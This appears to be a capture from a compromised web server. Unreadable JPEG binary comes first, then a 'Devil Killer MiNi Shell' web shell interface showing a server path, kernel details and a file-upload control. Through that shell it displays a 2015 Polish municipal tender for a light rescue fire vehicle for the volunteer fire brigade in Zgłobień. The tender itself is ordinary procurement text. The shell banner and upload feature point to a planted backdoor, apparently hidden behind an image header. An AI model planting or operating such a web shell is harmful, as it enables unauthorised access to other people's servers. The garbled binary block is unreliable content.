JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150717/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20150717/106889-N-2015.html

<p class="kh_header"><b>Boguchwała: Zakup nowego samochodu lekkiego ratownictwa technicznego z funkcją gaśniczą.
 Samochód dla OSP w Zgłobniu</b><br>
<b>Numer ogłoszenia: 106889 - 2015; data zamieszczenia: 17.07.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Boguchwała , ul. Tkaczowa 134, 36-040 Boguchwała, woj. podkarpackie, tel. 017 8755201, faks 017 8755209.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.boguchwala.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup nowego samochodu lekkiego ratownictwa technicznego z funkcją gaśniczą.
 Samochód dla OSP w Zgłobniu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wymagania podstawowe:
1.	Pojazd ma spełniać wymagania Rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 20 czerwca 2007 r. w sprawie wykazu wyrobów służących zapewnieniu bezpieczeństwa publicznego lub ochronie zdrowia i życia oraz mienia, a także zasad wydawania dopuszczenia tych wyrobów do użytkowania (Dz. U. z 2007 r. Nr 143, poz. 1002 ze zm.).
2.	Pojazd ma spełniać przepisy Polskiej Normy PN-EN 1846-1 oraz PN-EN 1846-2. 
3.	Pojazd ma spełniać wymagania polskich przepisów o ruchu drogowym zgodnie z ustawą Prawo o ruchu drogowym z uwzględnieniem wymagań dotyczących pojazdów uprzywilejowanych. 
4.	Samochód ma posiadać świadectwo dopuszczenia wyrobu do stosowania w jednostkach ochrony przeciwpożarowej wydane przez polską jednostkę certyfikującą. Kopia świadectwa potwierdzona za zgodność z oryginałem. 
5.	Samochód ma posiadać aktualne świadectwo homologacji typu podwozia. 

Wymagania szczegółowe: 

LP	Wyszczególnienie
1	Podwozie z kabiną
1.1	Samochód - fabrycznie nowy, rok produkcji 2015. 
1.2	Pojazd musi posiadać:
- ważne świadectwo dopuszczenia CNBOP wydane w oparciu o  rozporządzenie Ministra Spraw Wewnętrznych i Administracji z dnia 20 czerwca 2007 r. w sprawie wykazu wyrobów służących do zapewnienia bezpieczeństwa publicznego lub ochronie zdrowia i życia lub mienia, a także wydania   dopuszczenia   tych   wyrobów do użytkowania (Dz. U. z dnia 2007 r. Nr 143, poz.1002 z poźn. zm.) ,
- d - dokument (kopię ) Świadectwo dopuszczenia potwierdzający  parametry oferowanego pojazdu  należy dołączyć do oferty - kopia potwierdzona za zgodność z oryginałem

1.3	Dopuszczalna masa całkowita pojazdu nie może przekraczać 3500 kg
Wymiary zewnętrzne pojazdu kompletnego:
- maksymalna długość całkowita po zabudowie 6050 mm
- minimalna wysokość całkowita pojazdu mierzona przy 
  nadwoziu sprzętowym 2500 mm
- szerokość maksymalna 2500 mm z lusterkami bocznymi
- rozstaw osi minimum 3600 mm
1.4	Pojazd wyposażony w urządzenie sygnalizacyjno -ostrzegawcze akustyczne i świetlne - belka świetlna z napisem  STRAŻ  montowana na dachu kabiny-
dodatkowa lampa sygnalizacyjna niebieska błyskowa 
z tyłu pojazdu, lampy wykonane w technologii LED, lampy zabezpieczone przed uszkodzeniami mechanicznymi. 
1.5	Dodatkowe 2 lampy stroboskopowe sygnalizacyjne niebieskie z przodu pojazdu.
1.6	Oferowany pojazd winien posiadać  silnik o zapłonie samoczynnym z turbo-doładowaniem,  spełniający n/w parametry:
- pojemność skokowa minimum 2250 cm3
- moc   minimum 130 KM
- momencie obrotowym  minimum 320 Nm,
- zużycie energii do 5MJ/km
- emisja CO w cyklu łączonym nie większa niż 300 g/km 
- norma emisji spalin EURO 5 plus
1.7	Układ jezdny 4x2 napęd na oś tylną na kołach podwójnych z fabryczną blokadą mechanizmu różnicowego
1.8	Układ hamulcowy wyposażony w ABS
- hamulce tarczowe na obu osiach
- skrzynia biegów 6 biegowa plus bieg wsteczny
1.9	Samochód przystosowany do przewozu min.6 osób, wyposażony w 4 drzwi:
- tapicerka łatwo zmywalna
- drzwi  przedziału  załogi  umieszczone  po obu stronach 
   pojazdu
- układ foteli w kabinie 1+1+4
- podłoga przedziału załogi i ładunkowego wyłożona wykładziną
  przeciwpoślizgową, trwałą, łatwo zmywalną.
- oświetlenie przedziału pasażerskiego włączane z kabiny 
  kierowcy i niezależnie z przedziału pasażerskiego
- dodatkowe gniazdo zapalniczki w kabinie kierowcy
- boczne lusterka regulowane elektrycznie i podgrzewane,
  składane ręcznie
- światła przeciwmgielne
- radio samochodowe z czytnikiem CD i pilotem sterującym 
  umieszczonym w zasięgu kierowcy
- poduszka powietrzna dla kierowcy
- elektrycznie regulowane szyby przednie w kabinie kierowcy
- szyby w tylnych drzwiach przesuwne lub elektrycznie regulowane 
- wszystkie szyby o wysokiej zdolności filtrowania
- układ kierowniczy ze wspomaganiem
- miejsce dowódcy wyposażone w półkę ułatwiającą czytanie 
  mapy i lampkę oświetlającą
- kabina wyposażona w ogrzewanie i w klimatyzację 
- wszystkie drzwi kabiny wyposażone w centralny zamek,  sterowany z przycisku w kluczyku
1.10	W kabinie zainstalowany radiotelefon o parametrach: częstotliwość VHF 136-174 MHz, moc 1÷25 W, odstęp międzykanałowy 12,5 kHz dostosowany do użytkowania w sieci MSWiA ,min 125 kanałów, wyświetlacz alfanumeryczny min 14 znaków. Obrotowy potencjometr siły głosu. Radiotelefon musi być przystosowany do użytkowania w sieci z sygnałem analogowym i cyfrowym
1.11	Elektryczne urządzenia radiowe oraz akustyczno-sygnalizacyjne wykonane w sposób nie powodujący zakłóceń podczas ich jednoczesnej pracy.
1.12	Kolorystyka
- błotniki i zderzaki - białe;
- kabina, zabudowa - RAL 3000;
Pojazd  oznakowany  numerami  operacyjnymi w kolorze białym wg wymagań Zamawiającego.
1.13	Pojazd wyposażony w hak typu kulowego-oczkowego  z tyłu pojazdu do holowania przyczepy o dopuszczalnej masie całkowitej do 2.5 t. oraz znormalizowane 7-biegunowe gniazdo elektryczne do przyczepy.
1.15	Zbiornik paliwa minimum 80 litrów
1.16	Tylne lampy pojazdu zabezpieczone przed uszkodzeniami mechanicznymi
2. Zabudowa pożarnicza
2.1	Zabudowa  samonośna  wykonana  z materiałów odpornych na korozję - stali nierdzewnej i/lub aluminium. Pokrycie zewnętrzne i wewnętrzne  wykonane z blachy aluminiowej.
Wymiary zewnętrzne zabudowy:
- wysokość i szerokość równa wysokości i szerokości kabiny 
  pasażerskiej długość nie mniejsza niż 2600mm.
2.2	Dach zabudowy w formie podestu roboczego w wykonaniu antypoślizgowym. Na platformie dachowej winien być zamontowany uchwyt na drabinę strażacką trzyprzęsłową
oraz skrzynia narzędziowa całkowicie wykonana z aluminium  o wymiarach min. 50x30x1800 mm 
2.3	Na tylnej ścianie nadwozia umieszczona drabinka umożliwiająca wejście na dach pojazdu z powierzchniami    stopni 
w wykonaniu antypoślizgowym.
2.4	Skrytki   na   sprzęt  i  wyposażenie zamykane żaluzjami  w kolorze naturalnym  aluminium, pyło i wodoszczelne w układzie  2+2+1, szerokość żaluzji bocznych minimum 1120 mm, tylnej minimum 750 mm.
2.5	Skrytki na sprzęt muszą być wyposażone w oświetlenie   LED włączane automatycznie po otwarciu żaluzji skrytki.
2.6	Pojazd powinien posiadać oświetlenie pola pracy wokół nadwozia sprzętowego zapewniające oświetlenie min. 5 luksów w odległości 1 m w warunkach słabej widoczności, oraz oświetlenie powierzchni platformy dachowej.
2.7	Szuflady i wysuwane tace muszą się automatycznie blokować    w    pozycji    zamkniętej, posiadać zabezpieczenie  przed  całkowitym wyciągnięciem  (wypadnięciem z prowadnic)
2.8	Szuflady  i  tace  wystające  w  pozycji otwartej powyżej  250  mm  poza  obrys  pojazdu muszą posiadać oznakowanie ostrzegawcze.
2.9	Uchwyty, klamki wszystkich urządzeń samochodu, drzwi żaluzjowych, szuflad, podestów, tac, muszą być  tak skonstruowane, aby umożliwiały ich obsługę  w rękawicach.
2.10	Konstrukcja skrytek zapewniająca odprowadzenie wody z ich wnętrza i skuteczną wentylację, szczególnie tych w których przewidziane będą urządzenia z napędem silnikowym i paliwem.
2.11	Powierzchnie platform, podestu roboczego i podłogi kabiny w wykonaniu antypoślizgowym.
2.12	Wysokociśnieniowy agregat wodno - pianowy 
o następujących minimalnych parametrach;
- wydajność pompy 50 l/m
- ciśnienie 40 bar
Agregat wyposażony w wysokociśnieniową linię szybkiego  natarcia o długości węża min. 30mb na zwijadle, zakończoną prądownicą pistoletową wodno-pianową o regulowanej wydajności z prądem zwartym i rozproszonym. Agregat musi posiadać świadectwo dopuszczenia wydane przez CNBOP. 
2.13	Zbiornik   wody   o   pojemności   300 l wykonany  z materiału odpornego na korozję.
2.14	1 szuflada wysuwana poziomo o nośności do 100 kg wyposażona w mocowania do transportu pompy szlamowej, 1 szuflada wysuwana pionowo z mocowaniami na 3 szt. aparatów powietrznych oraz mocowania na sprzęt burzący
 2.15	Na platformie dachowej mocowanie na tłumice, łopat itp.
2.16	Dwie półki z mocowaniami na urządzenia strażackie wg zapotrzebowania o nośności do 50 kg. Jedna z regulacją wysokości
2.17	Przegrody na minimum 10 węży tłocznych - rozmiar wg zapotrzebowania oraz  uchwyty na armaturę wodną (prądownice, rozdzielacze itp.)
2.18	Orurowanie   przednie   wzmacniające   zderzak  
2.19	Pojazd    wyposażony    w    system ładowania akumulatora z gniazdem umieszczonym w okolicach siedzenia    kierowcy,    kontrolką sygnalizującą ładowanie na desce rozdzielczej i blokadą rozruchu silnika w trakcje ładowania akumulatora.
2.20	Instalacja    elektryczna    dodatkowego osprzętu wyposażona w wyłącznik głównego zasilania.
2.21	Maszt pneumatyczny- elektryczny o mocy  2000 W, podnoszenie i opuszczanie za pomocą przycisków na konsoli umieszczonej wewnątrz nadwozia sprzętowego, zasilane najaśnice  z układu elektrycznego 230V  lub z agregatu prądotwórczego. Wysokość masztu po rozłożeniu od poziomu dachu do reflektora minimum 1,5 m. 
2.22	Agregat prądotwórczy służący do zasilania masztu oświetleniowego o następujących minimalnych parametrach:
- moc znamionowa ciągła 2400/2,5 [VA/kW]
- moc silnika napędzającego agregat 3 [kW] 
- stopień ochrony prądnicy IP 54
3.	Wymagana dokumentacja
3.1	Producent zabudowy musi posiadać aktualną autoryzację producenta pojazdu, wykorzystanego do zabudowy, upoważniającą firmę zabudowującą do wykonywania zabudów bez utraty gwarancji na pojazd bazowy. Autoryzacja ta musi gwarantować możliwość obsługi i napraw gwarancyjnych całego pojazdu w autoryzowanych stacjach obsługi producenta pojazdu bazowego.
Kopie dokumentu potwierdzającego autoryzację producenta zabudowy należy załączyć do oferty. 
4.	Warunki gwarancji pojazdu
4.1	- silnik, podzespoły i zabudowa minimum 24 miesiące
- powłoka lakiernicza minimum 36 miesięcy
- perforacja podwozia minimum 72 miesięcy.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 34.14.42.10-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.09.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każda oferta musi być zabezpieczona wadium o wartości: 3.000,00 zł (słownie: trzy tysiące złotych zł 00/100).

Wadium może być wniesione w jednej lub kilku następujących formach:
1) pieniądzu,
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3) gwarancjach bankowych,
4) gwarancjach ubezpieczeniowych,
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2014 r., poz. 1804).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli oferent przedłoży wraz z ofertą oświadczenie o spełnieniu warunków udziału w postępowaniu. Oświadczenie należy złożyć WG ZAŁĄCZNIKA NR 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał: co najmniej 1 zamówienie polegające na dostawie nowego samochodu lekkiego ratownictwa technicznego z funkcją gaśniczą. 
Zamawiający uzna warunek za spełniony jeżeli Wykonawca złoży wykaz zrealizowanych dostaw (Załącznik nr 4 do SIWZ) z podaniem wartości, przedmiotu, dat wykonania i podmiotów na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów czy zostały wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli oferent przedłoży wraz z ofertą oświadczenie o spełnieniu warunków udziału w postępowaniu. Oświadczenie należy złożyć WG ZAŁĄCZNIKA NR 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli oferent przedłoży wraz z ofertą oświadczenie o spełnieniu warunków udziału w postępowaniu. Oświadczenie należy złożyć WG ZAŁĄCZNIKA NR 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli oferent przedłoży wraz z ofertą oświadczenie o spełnieniu warunków udziału w postępowaniu. Oświadczenie należy złożyć WG ZAŁĄCZNIKA NR 3 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pozostałe dokumenty składające się na kompletną ofertę:
a)	wypełniony formularz oferty - wg Załącznika nr 1,
b)	upoważnienie osób podpisujących ofertę do jej podpisania, jeżeli nie wynika to bezpośrednio z dokumentów dołączonych do oferty,
c)	dokument ustanawiający Pełnomocnika Wykonawców wspólnie ubiegających się  o udzielenie zamówienia, upoważniający go do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego - o ile dotyczy,
d)	kserokopia dokumentu potwierdzającego wniesienie wadium,
e)	pisemne zobowiązania innych podmiotów do udostępnienia niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia - składane tylko w przypadku, gdy Wykonawca będzie polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów.

Dokumenty podmiotów zagranicznych
Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:
a)	dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że: nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert. 
b)	Jeżeli w kraju zamieszkania osoby, lub w kraju w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu, o którym mowa powyżej, zastępuje się go dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu gospodarczego lub zawodowego odpowiednio kraju miejsca zamieszkania osoby, lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem - wystawione z odpowiednią datą wymaganą dla tego dokumentu. 
c)	W przypadku wątpliwości co do treści dokumentu złożonego przez wykonawcę mającego siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamawiający może zwrócić się do właściwych organów odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, z wnioskiem o udzielenie niezbędnych informacji dotyczących przedłożonego dokumentu. 
Wymagane dokumenty należy przedstawić w formie oryginałów albo kserokopii. Dokumenty złożone w formie kserokopii muszą być opatrzone klauzulą ZA ZGODNOŚĆ Z ORYGINAŁEM i poświadczone za zgodność z oryginałem przez Wykonawcę. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski. 

Zamawiający zażąda przedstawienia oryginału lub notarialnie potwierdzonej kopii dokumentu wtedy, gdy złożona przez wykonawcę kserokopia dokumentu jest nieczytelna lub budzi uzasadnione wątpliwości co do jej prawdziwości, a zamawiający nie może sprawdzić jej prawdziwości  w inny sposób.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin wykonania zamówienia - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. 	Wszelkie zmiany i uzupełnienia treści niniejszej umowy, wymagają aneksu sporządzonego z zachowaniem formy pisemnej pod rygorem nieważności.
2.	Zamawiający przewiduje możliwość wprowadzenia istotnych zmian do umowy w przypadkach:
a) gdy konieczność zmiany, w tym w zakresie wysokości wynagrodzenia, związana jest ze zmianą powszechnie obowiązujących przepisów prawa (np. w zakresie zmiany wysokości stawki podatku VAT).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.boguchwala.pl<br>
